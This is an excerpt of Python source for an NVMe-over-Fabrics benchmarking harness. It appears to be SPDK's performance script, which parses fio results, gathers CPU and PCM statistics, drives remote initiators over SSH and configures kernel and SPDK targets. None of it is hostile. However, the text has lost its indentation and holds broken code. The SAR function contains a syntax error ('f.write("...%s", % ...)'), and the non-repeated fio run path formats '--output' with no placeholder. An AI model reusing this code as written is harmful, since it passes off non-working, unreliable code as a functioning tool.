read_max_lat = float(data["jobs"][job_pos]["read"][lat_key]["max"])
clat_key, clat_unit = get_lat_unit("clat", data["jobs"][job_pos]["read"])
read_p99_lat, read_p99_9_lat, read_p99_99_lat, read_p99_999_lat = get_clat_percentiles(
data["jobs"][job_pos]["read"][clat_key])
if "ns" in lat_unit:
read_avg_lat, read_min_lat, read_max_lat = [x / 1000 for x in [read_avg_lat, read_min_lat, read_max_lat]]
if "ns" in clat_unit:
read_p99_lat = read_p99_lat / 1000
read_p99_9_lat = read_p99_9_lat / 1000
read_p99_99_lat = read_p99_99_lat / 1000
read_p99_999_lat = read_p99_999_lat / 1000
write_iops = float(data["jobs"][job_pos]["write"]["iops"])
write_bw = float(data["jobs"][job_pos]["write"]["bw"])
lat_key, lat_unit = get_lat_unit("lat", data["jobs"][job_pos]["write"])
write_avg_lat = float(data["jobs"][job_pos]["write"][lat_key]["mean"])
write_min_lat = float(data["jobs"][job_pos]["write"][lat_key]["min"])
write_max_lat = float(data["jobs"][job_pos]["write"][lat_key]["max"])
clat_key, clat_unit = get_lat_unit("clat", data["jobs"][job_pos]["write"])
write_p99_lat, write_p99_9_lat, write_p99_99_lat, write_p99_999_lat = get_clat_percentiles(
data["jobs"][job_pos]["write"][clat_key])
if "ns" in lat_unit:
write_avg_lat, write_min_lat, write_max_lat = [x / 1000 for x in [write_avg_lat, write_min_lat, write_max_lat]]
if "ns" in clat_unit:
write_p99_lat = write_p99_lat / 1000
write_p99_9_lat = write_p99_9_lat / 1000
write_p99_99_lat = write_p99_99_lat / 1000
write_p99_999_lat = write_p99_999_lat / 1000
return [read_iops, read_bw, read_avg_lat, read_min_lat, read_max_lat,
read_p99_lat, read_p99_9_lat, read_p99_99_lat, read_p99_999_lat,
write_iops, write_bw, write_avg_lat, write_min_lat, write_max_lat,
write_p99_lat, write_p99_9_lat, write_p99_99_lat, write_p99_999_lat]
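    # Note: the ordering of the list returned above matches the `headers` list
    # defined in parse_results() below.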
def parse_results(self, results_dir, csv_file):
files = os.listdir(results_dir)
fio_files = filter(lambda x: ".fio" in x, files)
json_files = [x for x in files if ".json" in x]
headers = ["read_iops", "read_bw", "read_avg_lat_us", "read_min_lat_us", "read_max_lat_us",
"read_p99_lat_us", "read_p99.9_lat_us", "read_p99.99_lat_us", "read_p99.999_lat_us",
"write_iops", "write_bw", "write_avg_lat_us", "write_min_lat_us", "write_max_lat_us",
"write_p99_lat_us", "write_p99.9_lat_us", "write_p99.99_lat_us", "write_p99.999_lat_us"]
aggr_headers = ["iops", "bw", "avg_lat_us", "min_lat_us", "max_lat_us",
"p99_lat_us", "p99.9_lat_us", "p99.99_lat_us", "p99.999_lat_us"]
header_line = ",".join(["Name", *headers])
aggr_header_line = ",".join(["Name", *aggr_headers])
# Create empty results file
with open(os.path.join(results_dir, csv_file), "w") as fh:
fh.write(aggr_header_line + "\n")
rows = set()
for fio_config in fio_files:
self.log_print("Getting FIO stats for %s" % fio_config)
job_name, _ = os.path.splitext(fio_config)
# Look in the filename for rwmixread value. Function arguments do
# not have that information.
# TODO: Improve this function by directly using workload params instead
# of regexing through filenames.
if "read" in job_name:
rw_mixread = 1
elif "write" in job_name:
rw_mixread = 0
else:
rw_mixread = float(re.search(r"m_(\d+)", job_name).group(1)) / 100
# If "_CPU" exists in name - ignore it
            # Initiators for the same job could have different num_cores parameter
job_name = re.sub(r"_\d+CPU", "", job_name)
job_result_files = [x for x in json_files if job_name in x]
self.log_print("Matching result files for current fio config:")
for j in job_result_files:
self.log_print("\t %s" % j)
# There may have been more than 1 initiator used in test, need to check that
# Result files are created so that string after last "_" separator is server name
inits_names = set([os.path.splitext(x)[0].split("_")[-1] for x in job_result_files])
inits_avg_results = []
for i in inits_names:
self.log_print("\tGetting stats for initiator %s" % i)
# There may have been more than 1 test run for this job, calculate average results for initiator
i_results = [x for x in job_result_files if i in x]
i_results_filename = re.sub(r"run_\d+_", "", i_results[0].replace("json", "csv"))
separate_stats = []
for r in i_results:
try:
stats = self.read_json_stats(os.path.join(results_dir, r))
separate_stats.append(stats)
self.log_print(stats)
except JSONDecodeError as e:
self.log_print("ERROR: Failed to parse %s results! Results might be incomplete!")
init_results = [sum(x) for x in zip(*separate_stats)]
init_results = [x / len(separate_stats) for x in init_results]
inits_avg_results.append(init_results)
self.log_print("\tAverage results for initiator %s" % i)
self.log_print(init_results)
with open(os.path.join(results_dir, i_results_filename), "w") as fh:
fh.write(header_line + "\n")
fh.write(",".join([job_name, *["{0:.3f}".format(x) for x in init_results]]) + "\n")
# Sum results of all initiators running this FIO job.
            # Latency results are an average of latencies from across all initiators.
inits_avg_results = [sum(x) for x in zip(*inits_avg_results)]
inits_avg_results = OrderedDict(zip(headers, inits_avg_results))
for key in inits_avg_results:
if "lat" in key:
inits_avg_results[key] /= len(inits_names)
# Aggregate separate read/write values into common labels
# Take rw_mixread into consideration for mixed read/write workloads.
aggregate_results = OrderedDict()
for h in aggr_headers:
read_stat, write_stat = [float(value) for key, value in inits_avg_results.items() if h in key]
if "lat" in h:
_ = rw_mixread * read_stat + (1 - rw_mixread) * write_stat
else:
_ = read_stat + write_stat
aggregate_results[h] = "{0:.3f}".format(_)
rows.add(",".join([job_name, *aggregate_results.values()]))
# Save results to file
for row in rows:
with open(os.path.join(results_dir, csv_file), "a") as fh:
fh.write(row + "\n")
self.log_print("You can find the test results in the file %s" % os.path.join(results_dir, csv_file))
def measure_sar(self, results_dir, sar_file_name):
self.log_print("Waiting %d delay before measuring SAR stats" % self.sar_delay)
cpu_number = os.cpu_count()
sar_idle_sum = 0
time.sleep(self.sar_delay)
out = self.exec_cmd(["sar", "-P", "ALL", "%s" % self.sar_interval, "%s" % self.sar_count])
with open(os.path.join(results_dir, sar_file_name), "w") as fh:
for line in out.split("\n"):
if "Average" in line:
if "CPU" in line:
self.log_print("Summary CPU utilization from SAR:")
self.log_print(line)
elif "all" in line:
self.log_print(line)
else:
                        sar_idle_sum += float(line.split()[7])
fh.write(out)
sar_cpu_usage = cpu_number * 100 - sar_idle_sum
with open(os.path.join(results_dir, sar_file_name), "a") as f:
f.write("Total CPU used: %s", % sar_cpu_usage)
def measure_pcm_memory(self, results_dir, pcm_file_name):
time.sleep(self.pcm_delay)
cmd = ["%s/pcm-memory.x" % self.pcm_dir, "%s" % self.pcm_interval, "-csv=%s/%s" % (results_dir, pcm_file_name)]
pcm_memory = subprocess.Popen(cmd)
time.sleep(self.pcm_count)
pcm_memory.terminate()
def measure_pcm(self, results_dir, pcm_file_name):
time.sleep(self.pcm_delay)
cmd = ["%s/pcm.x" % self.pcm_dir, "%s" % self.pcm_interval, "-i=%s" % self.pcm_count, "-csv=%s/%s" % (results_dir, pcm_file_name)]
subprocess.run(cmd)
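# Post-process the PCM CSV with pandas: strip the auto-generated "Unnamed" column
# labels and extract the per-socket UPI traffic columns into a separate "skt_" CSV.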
df = pd.read_csv(os.path.join(results_dir, pcm_file_name), header=[0, 1])
df = df.rename(columns=lambda x: re.sub(r'Unnamed:[\w\s]*$', '', x))
skt = df.loc[:, df.columns.get_level_values(1).isin({'UPI0', 'UPI1', 'UPI2'})]
skt_pcm_file_name = "_".join(["skt", pcm_file_name])
skt.to_csv(os.path.join(results_dir, skt_pcm_file_name), index=False)
def measure_pcm_power(self, results_dir, pcm_power_file_name):
time.sleep(self.pcm_delay)
out = self.exec_cmd(["%s/pcm-power.x" % self.pcm_dir, "%s" % self.pcm_interval, "-i=%s" % self.pcm_count])
with open(os.path.join(results_dir, pcm_power_file_name), "w") as fh:
fh.write(out)
def measure_network_bandwidth(self, results_dir, bandwidth_file_name):
self.log_print("INFO: starting network bandwidth measure")
self.exec_cmd(["bwm-ng", "-o", "csv", "-F", "%s/%s" % (results_dir, bandwidth_file_name),
"-a", "1", "-t", "1000", "-c", str(self.bandwidth_count)])
def measure_dpdk_memory(self, results_dir):
self.log_print("INFO: waiting to generate DPDK memory usage")
time.sleep(self.dpdk_wait_time)
self.log_print("INFO: generating DPDK memory usage")
rpc.env.env_dpdk_get_mem_stats(self.client)
os.rename("/tmp/spdk_mem_dump.txt", "%s/spdk_mem_dump.txt" % (results_dir))
def sys_config(self):
self.log_print("====Kernel release:====")
self.log_print(os.uname().release)
self.log_print("====Kernel command line:====")
with open('/proc/cmdline') as f:
cmdline = f.readlines()
self.log_print('\n'.join(self.get_uncommented_lines(cmdline)))
self.log_print("====sysctl conf:====")
with open('/etc/sysctl.conf') as f:
sysctl = f.readlines()
self.log_print('\n'.join(self.get_uncommented_lines(sysctl)))
self.log_print("====Cpu power info:====")
self.log_print(self.exec_cmd(["cpupower", "frequency-info"]))
self.log_print("====zcopy settings:====")
self.log_print("zcopy enabled: %s" % (self.enable_zcopy))
self.log_print("====Scheduler settings:====")
self.log_print("SPDK scheduler: %s" % (self.scheduler_name))
class Initiator(Server):
def __init__(self, name, general_config, initiator_config):
super(Initiator, self).__init__(name, general_config, initiator_config)
# Required fields
self.ip = initiator_config["ip"]
self.target_nic_ips = initiator_config["target_nic_ips"]
# Defaults
self.cpus_allowed = None
self.cpus_allowed_policy = "shared"
self.spdk_dir = "/tmp/spdk"
self.fio_bin = "/usr/src/fio/fio"
self.nvmecli_bin = "nvme"
self.cpu_frequency = None
self.subsystem_info_list = []
if "spdk_dir" in initiator_config:
self.spdk_dir = initiator_config["spdk_dir"]
if "fio_bin" in initiator_config:
self.fio_bin = initiator_config["fio_bin"]
if "nvmecli_bin" in initiator_config:
self.nvmecli_bin = initiator_config["nvmecli_bin"]
if "cpus_allowed" in initiator_config:
self.cpus_allowed = initiator_config["cpus_allowed"]
if "cpus_allowed_policy" in initiator_config:
self.cpus_allowed_policy = initiator_config["cpus_allowed_policy"]
if "cpu_frequency" in initiator_config:
self.cpu_frequency = initiator_config["cpu_frequency"]
if os.getenv('SPDK_WORKSPACE'):
self.spdk_dir = os.getenv('SPDK_WORKSPACE')
self.ssh_connection = paramiko.SSHClient()
self.ssh_connection.set_missing_host_key_policy(paramiko.AutoAddPolicy())
self.ssh_connection.connect(self.ip, username=self.username, password=self.password)
self.exec_cmd(["sudo", "rm", "-rf", "%s/nvmf_perf" % self.spdk_dir])
self.exec_cmd(["mkdir", "-p", "%s" % self.spdk_dir])
self._nics_json_obj = json.loads(self.exec_cmd(["ip", "-j", "address", "show"]))
if "skip_spdk_install" not in general_config or general_config["skip_spdk_install"] is False:
self.copy_spdk("/tmp/spdk.zip")
self.set_local_nic_info(self.set_local_nic_info_helper())
self.set_cpu_frequency()
self.configure_system()
if self.enable_adq:
self.configure_adq()
self.sys_config()
def set_local_nic_info_helper(self):
return json.loads(self.exec_cmd(["lshw", "-json"]))
def __del__(self):
self.ssh_connection.close()
def exec_cmd(self, cmd, stderr_redirect=False, change_dir=None):
if change_dir:
cmd = ["cd", change_dir, ";", *cmd]
# In case one of the command elements contains whitespace and is not
# already quoted (e.g. when calling sysctl), quote it again to prevent
# expansion when sending to the remote system.
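# Illustrative example: ["echo", "hello world"] is sent to the remote shell as: echo "hello world"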
for i, c in enumerate(cmd):
if (" " in c or "\t" in c) and not (c.startswith("'") and c.endswith("'")):
cmd[i] = '"%s"' % c
cmd = " ".join(cmd)
# Redirect stderr to stdout using the get_pty option if needed
_, stdout, _ = self.ssh_connection.exec_command(cmd, get_pty=stderr_redirect)
out = stdout.read().decode(encoding="utf-8")
# Check the return code
rc = stdout.channel.recv_exit_status()
if rc:
raise CalledProcessError(int(rc), cmd, out)
return out
def put_file(self, local, remote_dest):
ftp = self.ssh_connection.open_sftp()
ftp.put(local, remote_dest)
ftp.close()
def get_file(self, remote, local_dest):
ftp = self.ssh_connection.open_sftp()
ftp.get(remote, local_dest)
ftp.close()
def copy_spdk(self, local_spdk_zip):
self.log_print("Copying SPDK sources to initiator %s" % self.name)
self.put_file(local_spdk_zip, "/tmp/spdk_drop.zip")
self.log_print("Copied sources zip from target")
self.exec_cmd(["unzip", "-qo", "/tmp/spdk_drop.zip", "-d", self.spdk_dir])
self.log_print("Sources unpacked")
def copy_result_files(self, dest_dir):
self.log_print("Copying results")
if not os.path.exists(dest_dir):
os.mkdir(dest_dir)
# Get list of result files from initiator and copy them back to target
file_list = self.exec_cmd(["ls", "%s/nvmf_perf" % self.spdk_dir]).strip().split("\n")
for file in file_list:
self.get_file(os.path.join(self.spdk_dir, "nvmf_perf", file),
os.path.join(dest_dir, file))
self.log_print("Done copying results")
def discover_subsystems(self, address_list, subsys_no):
num_nvmes = range(0, subsys_no)
nvme_discover_output = ""
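# Probe ports 4420 .. 4420+subsys_no-1 on every address in address_list; a kernel
# target exposes each subsystem on its own port, so many of these probes are
# expected to fail.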
for ip, subsys_no in itertools.product(address_list, num_nvmes):
self.log_print("Trying to discover: %s:%s" % (ip, 4420 + subsys_no))
nvme_discover_cmd = ["sudo",
"%s" % self.nvmecli_bin,
"discover", "-t", "%s" % self.transport,
"-s", "%s" % (4420 + subsys_no),
"-a", "%s" % ip]
try:
stdout = self.exec_cmd(nvme_discover_cmd)
if stdout:
nvme_discover_output = nvme_discover_output + stdout
except CalledProcessError:
# Do nothing. When discovering remote subsystems of a kernel target we
# expect "nvme discover" to fail a bunch of times, because we are
# essentially scanning ports.
pass
subsystems = re.findall(r'trsvcid:\s(\d+)\s+' # get svcid number
r'subnqn:\s+([a-zA-Z0-9\.\-\:]+)\s+' # get NQN id
r'traddr:\s+(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})', # get IP address
nvme_discover_output) # from nvme discovery output
subsystems = filter(lambda x: x[-1] in address_list, subsystems)
subsystems = list(set(subsystems))
subsystems.sort(key=lambda x: x[1])
self.log_print("Found matching subsystems on target side:")
for s in subsystems:
self.log_print(s)
self.subsystem_info_list = subsystems
def gen_fio_filename_conf(self, *args, **kwargs):
# Logic implemented in SPDKInitiator and KernelInitiator classes
pass
def gen_fio_config(self, rw, rwmixread, block_size, io_depth, subsys_no, num_jobs=None, ramp_time=0, run_time=10, rate_iops=0):
fio_conf_template = """
[global]
ioengine={ioengine}
{spdk_conf}
thread=1
group_reporting=1
direct=1
percentile_list=50:90:99:99.5:99.9:99.99:99.999
norandommap=1
rw={rw}
rwmixread={rwmixread}
bs={block_size}
time_based=1
ramp_time={ramp_time}
runtime={run_time}
rate_iops={rate_iops}
"""
if "spdk" in self.mode:
bdev_conf = self.gen_spdk_bdev_conf(self.subsystem_info_list)
self.exec_cmd(["echo", "'%s'" % bdev_conf, ">", "%s/bdev.conf" % self.spdk_dir])
ioengine = "%s/build/fio/spdk_bdev" % self.spdk_dir
spdk_conf = "spdk_json_conf=%s/bdev.conf" % self.spdk_dir
else:
ioengine = self.ioengine
spdk_conf = ""
out = self.exec_cmd(["sudo", "nvme", "list", "|", "grep", "-E", "'SPDK|Linux'",
"|", "awk", "'{print $1}'"])
subsystems = [x for x in out.split("\n") if "nvme" in x]
if self.cpus_allowed is not None:
self.log_print("Limiting FIO workload execution on specific cores %s" % self.cpus_allowed)
cpus_num = 0
cpus = self.cpus_allowed.split(",")
for cpu in cpus:
if "-" in cpu:
a, b = cpu.split("-")
a = int(a)
b = int(b)
cpus_num += len(range(a, b)) + 1
else:
cpus_num += 1
self.num_cores = cpus_num
threads = range(0, self.num_cores)
elif hasattr(self, 'num_cores'):
self.log_print("Limiting FIO workload execution to %s cores" % self.num_cores)
threads = range(0, int(self.num_cores))
else:
self.num_cores = len(subsystems)
threads = range(0, len(subsystems))
if "spdk" in self.mode:
filename_section = self.gen_fio_filename_conf(self.subsystem_info_list, threads, io_depth, num_jobs)
else:
filename_section = self.gen_fio_filename_conf(threads, io_depth, num_jobs)
fio_config = fio_conf_template.format(ioengine=ioengine, spdk_conf=spdk_conf,
rw=rw, rwmixread=rwmixread, block_size=block_size,
ramp_time=ramp_time, run_time=run_time, rate_iops=rate_iops)
# TODO: hipri disabled for now, as it causes fio errors:
# io_u error on file /dev/nvme2n1: Operation not supported
# See comment in KernelInitiator class, kernel_init_connect() function
if hasattr(self, "ioengine") and "io_uring" in self.ioengine:
fio_config = fio_config + """
fixedbufs=1
registerfiles=1
#hipri=1
"""
if num_jobs:
fio_config = fio_config + "numjobs=%s \n" % num_jobs
if self.cpus_allowed is not None:
fio_config = fio_config + "cpus_allowed=%s \n" % self.cpus_allowed
fio_config = fio_config + "cpus_allowed_policy=%s \n" % self.cpus_allowed_policy
fio_config = fio_config + filename_section
fio_config_filename = "%s_%s_%s_m_%s" % (block_size, io_depth, rw, rwmixread)
if hasattr(self, "num_cores"):
fio_config_filename += "_%sCPU" % self.num_cores
fio_config_filename += ".fio"
self.exec_cmd(["mkdir", "-p", "%s/nvmf_perf" % self.spdk_dir])
self.exec_cmd(["echo", "'%s'" % fio_config, ">", "%s/nvmf_perf/%s" % (self.spdk_dir, fio_config_filename)])
self.log_print("Created FIO Config:")
self.log_print(fio_config)
return os.path.join(self.spdk_dir, "nvmf_perf", fio_config_filename)
def set_cpu_frequency(self):
if self.cpu_frequency is not None:
try:
self.exec_cmd(["sudo", "cpupower", "frequency-set", "-g", "userspace"], True)
self.exec_cmd(["sudo", "cpupower", "frequency-set", "-f", "%s" % self.cpu_frequency], True)
self.log_print(self.exec_cmd(["sudo", "cpupower", "frequency-info"]))
except Exception:
self.log_print("ERROR: cpu_frequency will not work when intel_pstate is enabled!")
sys.exit()
else:
self.log_print("WARNING: you have disabled intel_pstate and using default cpu governance.")
def run_fio(self, fio_config_file, run_num=None):
job_name, _ = os.path.splitext(fio_config_file)
self.log_print("Starting FIO run for job: %s" % job_name)
self.log_print("Using FIO: %s" % self.fio_bin)
if run_num:
for i in range(1, run_num + 1):
output_filename = job_name + "_run_" + str(i) + "_" + self.name + ".json"
try:
output = self.exec_cmd(["sudo", self.fio_bin, fio_config_file, "--output-format=json",
"--output=%s" % output_filename, "--eta=never"], True)
self.log_print(output)
except subprocess.CalledProcessError as e:
self.log_print("ERROR: Fio process failed!")
self.log_print(e.stdout)
else:
output_filename = job_name + "_" + self.name + ".json"
output = self.exec_cmd(["sudo", self.fio_bin,
fio_config_file, "--output-format=json",
"--output" % output_filename], True)
self.log_print(output)
self.log_print("FIO run finished. Results in: %s" % output_filename)
def sys_config(self):
self.log_print("====Kernel release:====")
self.log_print(self.exec_cmd(["uname", "-r"]))
self.log_print("====Kernel command line:====")
cmdline = self.exec_cmd(["cat", "/proc/cmdline"])
self.log_print('\n'.join(self.get_uncommented_lines(cmdline.splitlines())))
self.log_print("====sysctl conf:====")
sysctl = self.exec_cmd(["cat", "/etc/sysctl.conf"])
self.log_print('\n'.join(self.get_uncommented_lines(sysctl.splitlines())))
self.log_print("====Cpu power info:====")
self.log_print(self.exec_cmd(["cpupower", "frequency-info"]))
class KernelTarget(Target):
def __init__(self, name, general_config, target_config):
super(KernelTarget, self).__init__(name, general_config, target_config)
# Defaults
self.nvmet_bin = "nvmetcli"
if "nvmet_bin" in target_config:
self.nvmet_bin = target_config["nvmet_bin"]
def __del__(self):
nvmet_command(self.nvmet_bin, "clear")
def kernel_tgt_gen_subsystem_conf(self, nvme_list, address_list):
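# Build an nvmetcli-compatible JSON config: every disk gets its own subsystem and
# port, with ports numbered consecutively from 4420 and spread across the provided
# NIC addresses. The result is written to kernel.conf for "nvmetcli restore".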
nvmet_cfg = {
"ports": [],
"hosts": [],
"subsystems": [],
}
# Split disks between NIC IPs
disks_per_ip = int(len(nvme_list) / len(address_list))
disk_chunks = [nvme_list[i * disks_per_ip:disks_per_ip + disks_per_ip * i] for i in range(0, len(address_list))]
subsys_no = 1
port_no = 0
for ip, chunk in zip(address_list, disk_chunks):
for disk in chunk:
nqn = "nqn.2018-09.io.spdk:cnode%s" % subsys_no
nvmet_cfg["subsystems"].append({
"allowed_hosts": [],
"attr": {
"allow_any_host": "1",
"serial": "SPDK00%s" % subsys_no,
"version": "1.3"
},
"namespaces": [
{
"device": {
"path": disk,
"uuid": "%s" % uuid.uuid4()
},
"enable": 1,
"nsid": subsys_no
}
],
"nqn": nqn
})
nvmet_cfg["ports"].append({
"addr": {
"adrfam": "ipv4",
"traddr": ip,
"trsvcid": "%s" % (4420 + port_no),
"trtype": "%s" % self.transport
},
"portid": subsys_no,
"referrals": [],
"subsystems": [nqn]
})
subsys_no += 1
port_no += 1
self.subsystem_info_list.append([port_no, nqn, ip])
with open("kernel.conf", "w") as fh:
fh.write(json.dumps(nvmet_cfg, indent=2))
pass
def tgt_start(self):
self.log_print("Configuring kernel NVMeOF Target")
if self.null_block:
print("Configuring with null block device.")
null_blk_list = ["/dev/nullb{}".format(x) for x in range(self.null_block)]
self.kernel_tgt_gen_subsystem_conf(null_blk_list, self.nic_ips)
self.subsys_no = len(null_blk_list)
else:
print("Configuring with NVMe drives.")
nvme_list = get_nvme_devices()
self.kernel_tgt_gen_subsystem_conf(nvme_list, self.nic_ips)
self.subsys_no = len(nvme_list)
nvmet_command(self.nvmet_bin, "clear")
nvmet_command(self.nvmet_bin, "restore kernel.conf")
if self.enable_adq:
self.adq_configure_tc()
self.log_print("Done configuring kernel NVMeOF Target")
class SPDKTarget(Target):
def __init__(self, name, general_config, target_config):
super(SPDKTarget, self).__init__(name, general_config, target_config)
# Required fields
self.core_mask = target_config["core_mask"]
self.num_cores = self.get_num_cores(self.core_mask)
# Defaults
self.dif_insert_strip = False
self.null_block_dif_type = 0
self.num_shared_buffers = 4096
self.bpf_proc = None
self.bpf_scripts = []
if "num_shared_buffers" in target_config:
self.num_shared_buffers = target_config["num_shared_buffers"]
if "null_block_dif_type" in target_config:
self.null_block_dif_type = target_config["null_block_dif_type"]
if "dif_insert_strip" in target_config:
self.dif_insert_strip = target_config["dif_insert_strip"]
if "bpf_scripts" in target_config:
self.bpf_scripts = target_config["bpf_scripts"]
def get_num_cores(self, core_mask):
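# Core masks may be given either as a hex bitmask (e.g. "0xF" -> 4 cores) or as a
# bracketed list of cores/ranges (e.g. "[0-3,8]" -> 5 cores); ranges are inclusive.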
if "0x" in core_mask:
return bin(int(core_mask, 16)).count("1")
else:
num_cores = 0
core_mask = core_mask.replace("[", "")
core_mask = core_mask.replace("]", "")
for i in core_mask.split(","):
if "-" in i:
x, y = i.split("-")
num_cores += len(range(int(x), int(y))) + 1
else:
num_cores += 1
return num_cores
def spdk_tgt_configure(self):
self.log_print("Configuring SPDK NVMeOF target via RPC")
# Create RDMA transport layer
rpc.nvmf.nvmf_create_transport(self.client, trtype=self.transport,
num_shared_buffers=self.num_shared_buffers,
dif_insert_or_strip=self.dif_insert_strip,
sock_priority=self.adq_priority)
self.log_print("SPDK NVMeOF transport layer:")
rpc.client.print_dict(rpc.nvmf.nvmf_get_transports(self.client))
if self.enable_adq:
self.adq_configure_tc()
self.log_print("Done configuring SPDK NVMeOF Target")
if self.null_block:
self.spdk_tgt_add_nullblock(self.null_block)
self.spdk_tgt_add_subsystem_conf(self.nic_ips, self.null_block)
else:
self.spdk_tgt_add_nvme_conf()
self.spdk_tgt_add_subsystem_conf(self.nic_ips)
def spdk_tgt_add_nullblock(self, null_block_count):
md_size = 0
block_size = 4096
if self.null_block_dif_type != 0:
md_size = 128
self.log_print("Adding null block bdevices to config via RPC")
for i in range(null_block_count):
self.log_print("Setting bdev protection to :%s" % self.null_block_dif_type)
rpc.bdev.bdev_null_create(self.client, 102400, block_size + md_size, "Nvme{}n1".format(i),
dif_type=self.null_block_dif_type, md_size=md_size)
self.log_print("SPDK Bdevs configuration:")
rpc.client.print_dict(rpc.bdev.bdev_get_bdevs(self.client))
def spdk_tgt_add_nvme_conf(self, req_num_disks=None):
self.log_print("Adding NVMe bdevs to config via RPC")
bdfs = get_nvme_devices_bdf()
bdfs = [b.replace(":", ".") for b in bdfs]
if req_num_disks:
if req_num_disks > len(bdfs):
self.log_print("ERROR: Requested number of disks is more than available %s" % len(bdfs))
sys.exit(1)
else:
bdfs = bdfs[0:req_num_disks]
for i, bdf in enumerate(bdfs):
rpc.bdev.bdev_nvme_attach_controller(self.client, name="Nvme%s" % i, trtype="PCIe", traddr=bdf)
self.log_print("SPDK Bdevs configuration:")
rpc.client.print_dict(rpc.bdev.bdev_get_bdevs(self.client))
def spdk_tgt_add_subsystem_conf(self, ips=None, req_num_disks=None):
self.log_print("Adding subsystems to config")
port = "4420"
if not req_num_disks:
req_num_disks = get_nvme_devices_count()
# Distribute bdevs between provided NICs
num_disks = range(0, req_num_disks)
if len(num_disks) == 1:
disks_per_ip = 1
else:
disks_per_ip = int(len(num_disks) / len(ips))
disk_chunks = [num_disks[i * disks_per_ip:disks_per_ip + disks_per_ip * i] for i in range(0, len(ips))]
# Create subsystems, add bdevs to namespaces, add listeners
for ip, chunk in zip(ips, disk_chunks):
for c in chunk:
nqn = "nqn.2018-09.io.spdk:cnode%s" % c
serial = "SPDK00%s" % c
bdev_name = "Nvme%sn1" % c
rpc.nvmf.nvmf_create_subsystem(self.client, nqn, serial,
allow_any_host=True, max_namespaces=8)
rpc.nvmf.nvmf_subsystem_add_ns(self.client, nqn, bdev_name)
rpc.nvmf.nvmf_subsystem_add_listener(self.client,
nqn=nqn,
trtype=self.transport,
traddr=ip,
trsvcid=port,
adrfam="ipv4")
self.subsystem_info_list.append([port, nqn, ip])
self.log_print("SPDK NVMeOF subsystem configuration:")
rpc.client.print_dict(rpc.nvmf.nvmf_get_subsystems(self.client))
def bpf_start(self):
self.log_print("Starting BPF Trace scripts: %s" % self.bpf_scripts)
bpf_script = os.path.join(self.spdk_dir, "scripts/bpftrace.sh")
bpf_traces = [os.path.join(self.spdk_dir, "scripts/bpf", trace) for trace in self.bpf_scripts]
results_path = os.path.join(self.results_dir, "bpf_traces.txt")
with open(self.pid, "r") as fh:
nvmf_pid = str(fh.readline())
cmd = [bpf_script, nvmf_pid, *bpf_traces]
self.log_print(cmd)
self.bpf_proc = subprocess.Popen(cmd, env={"BPF_OUTFILE": results_path})
def tgt_start(self):
if self.null_block:
self.subsys_no = 1
else:
self.subsys_no = get_nvme_devices_count()
self.log_print("Starting SPDK NVMeOF Target process")
nvmf_app_path = os.path.join(self.spdk_dir, "build/bin/nvmf_tgt")
proc = subprocess.Popen([nvmf_app_path, "--wait-for-rpc", "-m", self.core_mask])
self.pid = os.path.join(self.spdk_dir, "nvmf.pid")
with open(self.pid, "w") as fh:
fh.write(str(proc.pid))
self.nvmf_proc = proc
self.log_print("SPDK NVMeOF Target PID=%s" % self.pid)
self.log_print("Waiting for spdk to initilize...")
while True:
if os.path.exists("/var/tmp/spdk.sock"):
break
time.sleep(1)
self.client = rpc.client.JSONRPCClient("/var/tmp/spdk.sock")
if self.enable_zcopy:
rpc.sock.sock_impl_set_options(self.client, impl_name="posix",
enable_zerocopy_send_server=True)
self.log_print("Target socket options:")
rpc.client.print_dict(rpc.sock.sock_impl_get_options(self.client, impl_name="posix"))
if self.enable_adq:
rpc.sock.sock_impl_set_options(self.client, impl_name="posix", enable_placement_id=1)
rpc.bdev.bdev_nvme_set_options(self.client, timeout_us=0, action_on_timeout=None,
nvme_adminq_poll_period_us=100000, retry_count=4)
rpc.nvmf.nvmf_set_config(self.client, acceptor_poll_rate=10000)
rpc.app.framework_set_scheduler(self.client, name=self.scheduler_name)
rpc.framework_start_init(self.client)
if self.bpf_scripts:
self.bpf_start()
self.spdk_tgt_configure()
def __del__(self):
if self.bpf_proc:
self.log_print("Stopping BPF Trace script")
self.bpf_proc.terminate()
self.bpf_proc.wait()
if hasattr(self, "nvmf_proc"):
try:
self.nvmf_proc.terminate()
self.nvmf_proc.wait()
except Exception as e:
self.log_print(e)
self.nvmf_proc.kill()
self.nvmf_proc.communicate()
class KernelInitiator(Initiator):
def __init__(self, name, general_config, initiator_config):
super(KernelInitiator, self).__init__(name, general_config, initiator_config)
# Defaults
self.extra_params = ""
self.ioengine = "libaio"
if "extra_params" in initiator_config:
self.extra_params = initiator_config["extra_params"]
if "kernel_engine" in initiator_config:
self.ioengine = initiator_config["kernel_engine"]
if "io_uring" in self.ioengine:
self.extra_params = "--nr-poll-queues=8"
def __del__(self):
self.ssh_connection.close()
def get_connected_nvme_list(self):
json_obj = json.loads(self.exec_cmd(["sudo", "nvme", "list", "-o", "json"]))
nvme_list = [os.path.basename(x["DevicePath"]) for x in json_obj["Devices"]
if "SPDK" in x["ModelNumber"] or "Linux" in x["ModelNumber"]]
return nvme_list
def kernel_init_connect(self):
self.log_print("Below connection attempts may result in error messages, this is expected!")
for subsystem in self.subsystem_info_list:
self.log_print("Trying to connect %s %s %s" % subsystem)
self.exec_cmd(["sudo", self.nvmecli_bin, "connect", "-t", self.transport,
"-s", subsystem[0], "-n", subsystem[1], "-a", subsystem[2], self.extra_params])
time.sleep(2)
if "io_uring" in self.ioengine:
self.log_print("Setting block layer settings for io_uring.")
# TODO: io_poll=1 and io_poll_delay=-1 params not set here, because
# apparently it's not possible for connected subsystems.
# Results in "error: Invalid argument"
block_sysfs_settings = {
"iostats": "0",
"rq_affinity": "0",
"nomerges": "2"
}
for disk in self.get_connected_nvme_list():
sysfs = os.path.join("/sys/block", disk, "queue")
for k, v in block_sysfs_settings.items():
sysfs_opt_path = os.path.join(sysfs, k)
try:
self.exec_cmd(["sudo", "bash", "-c", "echo %s > %s" % (v, sysfs_opt_path)], stderr_redirect=True)
except subprocess.CalledProcessError as e:
self.log_print("Warning: command %s failed due to error %s. %s was not set!" % (e.cmd, e.output, v))
finally:
_ = self.exec_cmd(["sudo", "cat", "%s" % (sysfs_opt_path)])
self.log_print("%s=%s" % (sysfs_opt_path, _))
def kernel_init_disconnect(self):
for subsystem in self.subsystem_info_list:
self.exec_cmd(["sudo", self.nvmecli_bin, "disconnect", "-n", subsystem[1]])
time.sleep(1)
def gen_fio_filename_conf(self, threads, io_depth, num_jobs=1):
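# Distribute the connected /dev/nvme devices round-robin across the FIO job
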